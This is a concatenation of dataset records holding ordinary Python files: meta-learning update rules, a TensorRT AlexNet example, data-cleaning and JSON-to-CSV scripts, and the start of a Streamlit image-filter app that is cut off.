----------\n model : `torchmeta.modules.MetaModule` instance\n The model.\n\n loss : `torch.Tensor` instance\n The value of the inner-loss. This is the result of the training dataset\n through the loss function.\n\n params : `collections.OrderedDict` instance, optional\n Dictionary containing the meta-parameters of the model. If `None`, then\n the values stored in `model.meta_named_parameters()` are used. This is\n useful for running multiple steps of gradient descent as the inner-loop.\n\n step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)\n The step size in the gradient update. If an `OrderedDict`, then the\n keys must match the keys in `params`.\n\n first_order : bool (default: `False`)\n If `True`, then the first order approximation of MAML is used.\n\n threshold : torch.Tensor, either 1 dim or dim compatible with last layer output. (default: torch.Tensor([.05], requires_grad=False)\n\n Returns\n -------\n updated_params : `collections.OrderedDict` instance\n Dictionary containing the updated meta-parameters of the model, with one\n gradient update wrt. the inner-loss.\n \n \"\"\"\n \n if not isinstance(model, MetaModule):\n raise ValueError('The model must be an instance of `torchmeta.modules.'\n 'MetaModule`, got `{0}`'.format(type(model)))\n\n if params is None:\n params = OrderedDict(model.meta_named_parameters())\n \n pdb.set_trace()\n \n S = fast_sigmoid(U)\n \n #dLdU = cross_entropy_gradient(U,targets)\n \n dLdS = cross_entropy_gradient(S,targets)\n dLdS.requires_grad = True\n \n #dLdU.requires_grad = True\n #dSdU = torch.autograd.grad(S,U,dLdS,retain_graph=True)#S.backward(U, retain_graph=True)\n if threshold is None:\n threshold = torch.Tensor([.05], requires_gradient=False).to(model.get_input_layer_device())\n triggered = error_trigger(dLdS, threshold)\n \n # USE THIS FOR DEBUGGING\n #print('Error Rate',torch.sum(triggered!=0)/torch.prod(torch.Tensor(tuple(triggered.size()))))\n \n ## Update last layer only (as in SOEL paper )\n if hasattr(model, 'LIF_layers'):\n param_name_weight = 'LIF_layers.{0}.base_layer.weight'.format(len(model.LIF_layers)-1)\n param_name_bias = None #'LIF_layers.{0}.base_layer.bias'.format(len(model.LIF_layers)-1)\n \n dUdW = torch.autograd.grad(U,params[param_name_weight],grad_outputs=triggered,retain_graph=True) \n if param_name_bias is not None:\n dUdb = torch.autograd.grad(U,params[param_name_bias],grad_outputs=triggered,retain_graph=True) \n \n elif hasattr(model, 'blocks'):\n mhid = \"Mhid\"\n param_name_weight = f'blocks.{len(model.network_params[mhid])}.synapse.weight'\n param_name_bias = None\n \n dUdW = torch.autograd.grad(U,params[param_name_weight],grad_outputs=triggered,retain_graph=True) \n #dUdb = torch.autograd.grad(U,params[param_name_bias],grad_outputs=triggered,retain_graph=True) \n \n #pdb.set_trace()\n \n updated_params = OrderedDict()\n \n for name, param in params.items():\n if name == param_name_weight:\n updated_params[name] = param - step_size * dUdW[0]\n elif name == param_name_bias:\n updated_params[param_name_bias] = param - step_size * dUdb[0]\n else: \n updated_params[name] = param\n\n\n\n\n \n return updated_params\n\n\n \ndef custom_sgd(model,\n loss,\n params=None,\n step_size=0.5,\n first_order=False,\n custom_update_fn = None):\n \"\"\"Update of the meta-parameters with one step of gradient descent on the\n loss function.\n\n Parameters\n ----------\n model : `torchmeta.modules.MetaModule` instance\n The model.\n\n loss : `torch.Tensor` instance\n The value of the inner-loss. This is the result of the training dataset\n through the loss function.\n\n params : `collections.OrderedDict` instance, optional\n Dictionary containing the meta-parameters of the model. If `None`, then\n the values stored in `model.meta_named_parameters()` are used. This is\n useful for running multiple steps of gradient descent as the inner-loop.\n\n step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)\n The step size in the gradient update. If an `OrderedDict`, then the\n keys must match the keys in `params`.\n\n first_order : bool (default: `False`)\n If `True`, then the first order approximation of MAML is used.\n\n Returns\n -------\n updated_params : `collections.OrderedDict` instance\n Dictionary containing the updated meta-parameters of the model, with one\n gradient update wrt. the inner-loss.\n \"\"\"\n if not isinstance(model, MetaModule):\n raise ValueError('The model must be an instance of `torchmeta.modules.'\n 'MetaModule`, got `{0}`'.format(type(model)))\n\n if params is None:\n #print(\"params is None\")\n params = OrderedDict(model.meta_named_parameters())\n print(\"params\", params.keys())\n # else:\n # print(\"params is not None\")\n\n\n grads = torch.autograd.grad(loss,\n params.values(),\n create_graph=not first_order,\n allow_unused=True)\n \n #grad_flow('./',grads)\n \n #pdb.set_trace()\n \n# torch.save(grads,\"saved_inputs_and_grads/grads.pt\")\n \n# i=1/0\n \n updated_params = OrderedDict()\n\n if isinstance(step_size, (dict, OrderedDict)):\n for (name, param), grad in zip(params.items(), grads):\n if grad is not None:\n if custom_update_fn is not None and 'weight' in name:\n deltaw = custom_update_fn(grad, params[name].data, eta=step_size[name])\n updated_params[name] = param - deltaw #ws - w - ws\n else:\n updated_params[name] = param - step_size[name] * grad\n\n else:\n for (name, param), grad in zip(params.items(), grads):\n if grad is not None:\n # print(f\"{name} grad is\")\n # print(grad.shape)\n # print(grad)\n # pdb.set_trace()\n if custom_update_fn is not None and 'weight' in name:\n w = custom_update_fn(grad, param, eta=step_size)\n updated_params[name] = w\n else:\n # if grad.any()!=0:\n # print('updating')\n # pdb.set_trace()\n updated_params[name] = param - step_size * grad\n \n\n return updated_params\n\ndef custom_sgd_reg(model, loss, params=None, step_size=0.5, anchor_params=None, lamda=1.0):\n \"\"\"Update of the meta-parameters with one step of gradient descent on the\n loss function.\n \"\"\"\n if not isinstance(model, MetaModule):\n raise ValueError('The model must be an instance of `torchmeta.modules.'\n 'MetaModule`, got `{0}`'.format(type(model)))\n\n if params is None:\n params = OrderedDict(model.meta_named_parameters())\n\n anchor_params = OrderedDict(anchor_params)\n\n grads = torch.autograd.grad(loss,\n params.values(),\n create_graph=True,\n allow_unused=True)\n \n updated_params = OrderedDict()\n\n for (name, param), grad in zip(params.items(), grads):\n if isinstance(step_size, (dict, OrderedDict)):\n ss = step_size[name]\n else:\n ss = step_size\n\n # Should this not be the difference between param and anchor_value? Note the negative sign inside the bracket\n updated_params[name] = param - ss * lamda * (param - anchor_params[name])\n # updated_params[name] = (1 - lamda * ss) * param - lamda * ss * anchor_params[name]\n\n if grad is not None:\n updated_params[name] = param - step_size[name] * grad\n\n return updated_params, grads\n\n", "repo_name": "nmi-lab/snn_maml", "sub_path": "snn_maml/plasticity_rules.py", "file_name": "plasticity_rules.py", "file_ext": "py", "file_size_in_byte": 15665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.autograd", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.abs", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.norm", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.numel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 91, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 164, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 179, "usage_type": "call"}, {"api_name": "torchmeta.modules.MetaModule", "line_number": 237, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 242, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 267, "usage_type": "attribute"}, {"api_name": "torch.autograd.grad", "line_number": 269, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 269, "usage_type": "attribute"}, {"api_name": "torch.autograd.grad", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 276, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 281, "usage_type": "call"}, {"api_name": "torchmeta.modules.MetaModule", "line_number": 335, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 341, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 347, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 360, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 362, "usage_type": "name"}, {"api_name": "torchmeta.modules.MetaModule", "line_number": 394, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 399, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 403, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 408, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 411, "usage_type": "name"}]} +{"seq_id": "10224451552", "text": "import tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nimport numpy as np\nfrom torchvision.models.alexnet import alexnet\nfrom torch import nn\n\nACTIVATIONS = {\n nn.ReLU: trt.infer.ActivationType.RELU,\n nn.Sigmoid: trt.infer.ActivationType.SIGMOID,\n nn.Tanh: trt.infer.ActivationType.TANH\n }\n\nPOOLINGS = {\n nn.MaxPool2d: trt.infer.PoolingType.MAX,\n nn.AvgPool2d: trt.infer.PoolingType.AVERAGE\n}\n\n\ntensor_type = trt.infer.Tensor\n\n\ndef as_tuple(x):\n return x if isinstance(x, tuple) else (x, x)\n\n\ndef __convolution__(network, prev_layer, layer):\n num_output = layer.out_channels\n state = layer.state_dict()\n W = state['weight'].numpy().flatten()\n b = state['bias'].numpy().flatten() if 'bias' in state else np.zeros(num_output)\n conv = network.add_convolution(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n num_output, layer.kernel_size, W, b)\n assert conv\n conv.set_stride(layer.stride)\n conv.set_dilation(trt.infer.DimsHW(layer.dilation))\n conv.set_padding(layer.padding)\n return conv#.get_output(0)\n\n\ndef __activation__(network, prev_layer, layer):\n act = network.add_activation(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n ACTIVATIONS[type(layer)])\n assert act\n return act\n\n\ndef __pooling__(network, prev_layer, layer):\n k = as_tuple(layer.kernel_size)\n s = as_tuple(layer.stride)\n pool = network.add_pooling(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n POOLINGS[type(layer)], trt.infer.DimsHW(k))\n assert pool\n pool.set_stride(trt.infer.DimsHW(s))\n return pool\n\n\ndef __linear__(network, prev_layer, layer):\n num_output = layer.out_features\n state = layer.state_dict()\n W = state['weight'].numpy().flatten()\n b = state['bias'].numpy().flatten() if 'bias' in state else np.zeros(num_output)\n lin = network.add_fully_connected(\n prev_layer.get_output(0) if not isinstance(prev_layer, tensor_type) else prev_layer,\n num_output, W, b)\n assert lin\n return lin\n\ndef __sequential__(network, prev_layer, layer):\n net = prev_layer\n for _layer in layer.children():\n _type = type(_layer)\n if _type in mapping:\n net = mapping[_type](network, net, _layer)\n return net\n\nmapping = {\n nn.Sequential: __sequential__,\n\n nn.Conv2d: __convolution__,\n\n nn.Linear: __linear__,\n\n nn.ReLU: __activation__,\n nn.Tanh: __activation__,\n nn.Sigmoid: __activation__,\n\n nn.AvgPool2d: __pooling__,\n nn.MaxPool2d: __pooling__\n }\n\nmodel = alexnet(pretrained=True)\nlayers = []\nfor c in model.features.children():\n layers.append(c)\nfor c in model.classifier.children():\n layers.append(c)\n\nG_LOGGER = trt.infer.ConsoleLogger(trt.infer.LogSeverity.ERROR)\nbuilder = trt.infer.create_infer_builder(G_LOGGER)\n\nnetwork = builder.create_network()\n\n\n\nnet = network.add_input(\"data\", trt.infer.DataType.FLOAT, (3, 224, 224))\n\n# for module in model.children():\n# _type = type(module)\n# net = mapping[_type](network, net, module)\n\nnet = __convolution__(network, net, layers[0])\nnet = __activation__(network, net.get_output(0), layers[1])\nnet = __pooling__(network, net.get_output(0), layers[2])\nnet = __convolution__(network, net.get_output(0), layers[3])\nnet = __activation__(network, net.get_output(0), layers[4])\nnet = __pooling__(network, net.get_output(0), layers[5])\nnet = __convolution__(network, net.get_output(0), layers[6])\nnet = __activation__(network, net.get_output(0), layers[7])\nnet = __convolution__(network, net.get_output(0), layers[8])\nnet = __activation__(network, net.get_output(0), layers[9])\nnet = __convolution__(network, net.get_output(0), layers[10])\nnet = __activation__(network, net.get_output(0), layers[11])\nnet = __pooling__(network, net.get_output(0), layers[12])\nnet = __linear__(network, net.get_output(0), layers[14])\nnet = __activation__(network, net.get_output(0), layers[15])\nnet = __linear__(network, net.get_output(0), layers[17])\nnet = __activation__(network, net.get_output(0), layers[18])\nnet = __linear__(network, net.get_output(0), layers[19])\n\nnetwork.mark_output(net.get_output(0))\n\nbuilder.set_max_batch_size(1)\nbuilder.set_max_workspace_size(1 << 20)\n\nengine = builder.build_cuda_engine(network)\nnetwork.destroy()\nbuilder.destroy()\n\nruntime = trt.infer.create_infer_runtime(G_LOGGER)\nimg = np.random.randn(3, 224, 224)\nimg = img.ravel()\n\ncontext = engine.create_execution_context()\n\noutput = np.empty(1000, dtype=np.float32)\n\n# alocate device memory\nd_input = cuda.mem_alloc(1 * img.size * img.dtype.itemsize)\nd_output = cuda.mem_alloc(1 * output.size * output.dtype.itemsize)\n\nbindings = [int(d_input), int(d_output)]\n\nstream = cuda.Stream()\n# transfer input data to device\ncuda.memcpy_htod_async(d_input, img, stream)\n# execute model\ncontext.enqueue(1, bindings, stream.handle, None)\n# transfer predictions back\ncuda.memcpy_dtoh_async(output, d_output, stream)\n\nstream.synchronize()\nprint(\"Prediction: \" + str(np.argmax(output)))\n", "repo_name": "Lextal/inference-exercise", "sub_path": "examples/alexnet_compiling.py", "file_name": "alexnet_compiling.py", "file_ext": "py", "file_size_in_byte": 5191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.ReLU", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "tensorrt.infer", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "tensorrt.infer", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorrt.infer.DimsHW", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.DimsHW", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.DimsHW", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet.alexnet", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorrt.infer.ConsoleLogger", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.create_infer_builder", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorrt.infer", "line_number": 109, "usage_type": "attribute"}, {"api_name": "tensorrt.infer.create_infer_runtime", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorrt.infer", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pycuda.driver.mem_alloc", "line_number": 152, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 152, "usage_type": "name"}, {"api_name": "pycuda.driver.mem_alloc", "line_number": 153, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 153, "usage_type": "name"}, {"api_name": "pycuda.driver.Stream", "line_number": 157, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 157, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_htod_async", "line_number": 159, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 159, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_dtoh_async", "line_number": 163, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "32710949986", "text": "import logging\nimport numpy as np\n\nLOGGER = logging.getLogger(__name__)\n\ndef get_attributes_with_matching_dimension(obj, dims):\n \"\"\"\n Get the attributes of an object that have len(dims) number\n of dimensions or more, and all dims are individual parts of the\n attribute's shape.\n\n\n Parameters\n ----------\n obj : object of any class\n The object from which matching attributes are returned\n dims : list[int]\n List of dimensions size to match\n\n Returns\n -------\n list_of_attrs : list[str]\n List of names of the attributes with matching dimensions\n \"\"\"\n\n list_of_attrs = []\n for attr, value in obj.__dict__.items():\n\n if isinstance(value, list):\n try:\n value = np.array(value)\n except ValueError as verr:\n if \"inhomogenous shape\" in str(verr):\n continue\n\n try:\n if all([dims.count(i) <= value.shape.count(i) for i in set(dims)]):\n list_of_attrs.append(attr)\n except AttributeError:\n continue\n\n return list_of_attrs\n", "repo_name": "CLIMADA-project/climada_python", "sub_path": "climada/util/select.py", "file_name": "select.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 248, "dataset": "github-code", "pt": "46", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "24450801774", "text": "import re\nimport datetime\nimport time\nimport json\nimport find_player\nimport logging\nimport player\n\nfrom libscrape.config import config\nfrom libscrape.config import db\nfrom libscrape.config import constants \n\n\nLOGDIR_CLEAN = constants.LOGDIR_CLEAN\nLOGDIR_EXTRACT = constants.LOGDIR_EXTRACT\nLOGDIR_SOURCE = constants.LOGDIR_SOURCE\n\n\nclass Clean:\n\n def __init__(self, filename, gamedata, dbobj):\n self.raw_data = open(LOGDIR_EXTRACT + filename,'r').read()\n self.dbobj = dbobj\n self.game = gamedata\n self.filename = filename\n\n self.home_players = self._getPlayersInGame(self.game['home_team_id'])\n self.away_players = self._getPlayersInGame(self.game['away_team_id'])\n\n\n def clean(self):\n plays = self._parse()\n plays = self._resolveTeam(plays)\n plays = self._resolveScore(plays)\n plays = self._resolveDescription(plays)\n plays = self._resolveDecisecondsLeft(plays)\n plays = self._renameFields(plays)\n plays = self._resolvePlays(plays)\n plays = self._addGameId(plays)\n plays = self._deleteFields(plays)\n\n self._dumpFile(plays)\n\n\n def _parse(self):\n plays = []\n\n data = json.loads(self.raw_data)\n for line in data['resultSets']:\n if 'name' in line.keys() and line['name'] == 'PlayByPlay':\n for event in line['rowSet']:\n plays.append(dict(zip([header.lower() for header in line['headers']],event)))\n\n return plays\n\n\n def _resolveTeam(self, plays):\n data = []\n for play in plays:\n if play['homedescription']:\n play['team_id'] = self.game['home_team_id']\n elif play['visitordescription']:\n play['team_id'] = self.game['away_team_id']\n else:\n play['team_id'] = 0\n\n data.append(play)\n\n return data\n\n\n def _resolveScore(self, plays):\n data = []\n home_score = 0\n away_score = 0\n for play in plays:\n if play['score']:\n play['home_score'], play['away_score'] = play['score'].split(' - ')\n home_score = play['home_score']\n away_score = play['away_score']\n else:\n play['home_score'] = home_score\n play['away_score'] = away_score\n\n data.append(play)\n\n return data\n\n\n def _addGameId(self, plays):\n data = []\n for play in plays:\n play['game_id'] = self.game['id']\n data.append(play)\n\n return data\n\n\n def _resolveDescription(self, plays):\n data = []\n for play in plays:\n if play['homedescription']:\n play['description'] = play['homedescription'].strip()\n elif play['visitordescription']:\n play['description'] = play['visitordescription'].strip()\n else:\n play['description'] = play['neutraldescription'].strip()\n\n data.append(play)\n\n return data\n\n\n def _resolveDecisecondsLeft(self, plays):\n data = []\n for play in plays:\n time_left = play['pctimestring'].split(':') \n play['deciseconds_left'] = (int(time_left[0]) * 60 + int(time_left[1])) * 10\n data.append(play)\n\n return data\n\n\n def _renameFields(self, plays):\n data = []\n for play in plays:\n play['game_event_id'] = play['eventnum']\n data.append(play)\n\n return data\n\n\n def _resolvePlays(self, plays):\n data = []\n patterns = self.dbobj.query_dict(\"SELECT id, re FROM play_type_statsnbacom ORDER BY priority ASC\")\n resolveobj = player.Resolve(self.dbobj)\n\n\n for play in plays:\n play['play_type_statsnbacom_id'] = 0\n \n for pattern in patterns:\n match = re.match(pattern['re'], play['description'])\n if match:\n matched_attributes = match.groupdict()\n if 'player_id' in matched_attributes.keys():\n player_id = 0\n # Try last name first, then full name second\n if play['team_id'] == self.game['home_team_id']:\n player_list_last_name = [(line['id'], line['last_name']) for line in self.home_players]\n player_list_full_name = [(line['id'], line['full_name']) for line in self.home_players]\n elif play['team_id'] == self.game['away_team_id']: \n player_list_last_name = [(line['id'], line['last_name']) for line in self.away_players]\n player_list_full_name = [(line['id'], line['full_name']) for line in self.away_players]\n\n player_match = resolveobj.matchByNameApproximate(matched_attributes['player_id'], player_list_last_name)\n if player_match:\n player_id = player_match\n else:\n player_match = resolveobj.matchByNameApproximate(matched_attributes['player_id'], player_list_full_name)\n if player_match:\n player_id = player_match\n\n play['player_id'] = player_id\n\n\n play['play_type_statsnbacom_id'] = pattern['id']\n #print (play['play_type_statsnbacom_id'], play['description'], match.groupdict())\n break\n\n data.append(play)\n\n return data\n\n\n def _deleteFields(self, plays):\n data = []\n for play in plays:\n del play['eventnum']\n del play['score']\n del play['scoremargin']\n data.append(play)\n\n return data\n\n\n def _getPlayersInGame(self, team_id):\n return self.dbobj.query_dict(\"\"\"\n SELECT p.id, p.full_name, p.last_name\n FROM player_statsnbacom ps\n INNER JOIN player p ON p.id = ps.player_id\n WHERE ps.game_id = %s AND ps.team_id = %s\n \"\"\" % (self.game['id'], team_id))\n\n\n def _dumpFile(self, plays):\n f = open(LOGDIR_CLEAN + self.filename,'w')\n play_json = json.dumps(plays)\n f.write(play_json)\n\n\ndef main():\n\n dbobj = db.Db(config.dbconn_prod_nba)\n\n game = dbobj.query_dict(\"SELECT * FROM game WHERE id = %s\" % (4371))[0]\n filename = '%s_playbyplay_statsnbacom' % (game['abbrev'])\n obj = Clean(filename, game, dbobj)\n obj.clean()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "kpascual/nbascrape", "sub_path": "libscrape/clean/playbyplay_statsnbacom.py", "file_name": "playbyplay_statsnbacom.py", "file_ext": "py", "file_size_in_byte": 6597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 58, "dataset": "github-code", "pt": "41", "api": [{"api_name": "libscrape.config.constants.LOGDIR_CLEAN", "line_number": 14, "usage_type": "attribute"}, {"api_name": "libscrape.config.constants", "line_number": 14, "usage_type": "name"}, {"api_name": "libscrape.config.constants.LOGDIR_EXTRACT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "libscrape.config.constants", "line_number": 15, "usage_type": "name"}, {"api_name": "libscrape.config.constants.LOGDIR_SOURCE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "libscrape.config.constants", "line_number": 16, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "player.Resolve", "line_number": 136, "usage_type": "call"}, {"api_name": "re.match", "line_number": 143, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 198, "usage_type": "call"}, {"api_name": "libscrape.config.db.Db", "line_number": 204, "usage_type": "call"}, {"api_name": "libscrape.config.db", "line_number": 204, "usage_type": "name"}, {"api_name": "libscrape.config.config.dbconn_prod_nba", "line_number": 204, "usage_type": "attribute"}, {"api_name": "libscrape.config.config", "line_number": 204, "usage_type": "name"}]} +{"seq_id": "17625131318", "text": "import sys\nimport json\nimport csv\n\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\noutput_fp = open(output_file, 'w', encoding='utf-8')\n\n# Create the csv writer object\ncsv_writer = csv.writer(output_fp)\n\n# Counter variable used for writing\n# headers to the CSV file\ncount = 0\n\nwith open(input_file, 'r') as fp:\n for line in fp:\n user = json.loads(line) \n if count == 0:\n # Writing headers of CSV file\n header = user.keys()\n csv_writer.writerow(header)\n count += 1\n # Writing data of CSV file\n csv_writer.writerow(user.values())\n\noutput_fp.close()\n", "repo_name": "alextricity25/azure_utility_tool", "sub_path": "util_scripts/json_to_csv.py", "file_name": "json_to_csv.py", "file_ext": "py", "file_size_in_byte": 625, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "46", "api": [{"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "28717359582", "text": "import io\r\nimport base64\r\nfrom PIL import Image\r\nfrom filters import *\r\n\r\ndef get_img_download(img,filename,text):\r\n buffered = io.BytesIO()\r\n img.save(buffered,format=\"JPEG\")\r\n img_str = base64.b64encode(buffered.getvalue()).decode()\r\n href= f'{text}'\r\n return href\r\n#Set title\r\nst.title('Image Filters') \r\n\r\n#Upload Images\r\nuploaded_file = st.file_uploader(\"Choose an image file:\",type=['jpg','jpeg','png'])\r\n\r\nif uploaded_file is not None:\r\n raw_bytes = np.asarray(bytearray(uploaded_file.read()),dtype=np.uint8)\r\n img = cv2.imdecode(raw_bytes,cv2.IMREAD_COLOR)\r\n input_col,output_col = st.columns(2)\r\n \r\n with input_col:\r\n st.header(\"Original\")\r\n st.image(img,channels=\"BGR\",use_column_width=True)\r\n st.header(\"Filter Examples\")\r\n option = st.selectbox(\"Select a filter: \",('None','Black and White','Vintage','Vignette Effect','Pencil Sketch','Embossed','sketch_filter','cartoon_filter'))\r\n\r\n col1,col2,col3,col4 = st.columns(4)\r\n with col1:\r\n st.caption(\"Black and White\")\r\n st.image(\"bw.jpg\")\r\n with col2:\r\n st.caption(\"Cartoon Filter\")\r\n st.image(\"cartoon.jpg\")\r\n with col3:\r\n st.caption(\"Sepia Effect\")\r\n st.image(\"sepia.jpg\")\r\n with col4:\r\n st.caption(\"Pencil Sketch\")\r\n st.image('pencil.jpg')\r\n output_flag=1\r\n color = \"BGR\"\r\n\r\n #Generate filtered image based on the selected option \r\n if option=='None':\r\n output_flag=0\r\n elif option=='Black and White':\r\n output=bw_filter(img)\r\n color = 'GRAY'\r\n elif option=='Vintage':\r\n output = sepia(img)\r\n elif option=='Vignette Effect':\r\n level = st.slider(\"Level\",0,5,2)\r\n output = vignette(img,level)\r\n elif option == 'Pencil Sketch':\r\n #ksize= st.slider(\"Blur Kernel Size\",1,11,5,step=2)\r\n output = 